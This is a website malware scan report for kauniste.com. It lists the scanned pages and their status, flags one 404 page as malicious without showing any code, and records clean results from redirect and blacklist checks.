Scanned pages/files
Request | Server response | Status |
http://kauniste.com/ | 200 OK Content-Length: 4968 Content-Type: text/html | clean |
http://www.kauniste.com/src/js/jquery.min.js | 200 OK Content-Length: 91557 Content-Type: application/javascript | clean |
http://www.kauniste.com/src/js/jquery.backstretch.js | 200 OK Content-Length: 2769 Content-Type: application/javascript | clean |
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 21363 Content-Type: application/x-javascript | clean |
http://kauniste.com/?lng=fi | 200 OK Content-Length: 4968 Content-Type: text/html | clean |
http://kauniste.com/?lng=en | 200 OK Content-Length: 4897 Content-Type: text/html | clean |
http://kauniste.com/?lng=jp | 200 OK Content-Length: 5434 Content-Type: text/html | clean |
http://kauniste.com/test404page.js | 404 Not Found Content-Length: 7564 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kauniste.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 12:46:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: kauniste.com
Referer: http://www.google.com/search?q=kauniste.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kauniste.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kauniste.com/
Result: kauniste.com is not infected or malware details are not published yet.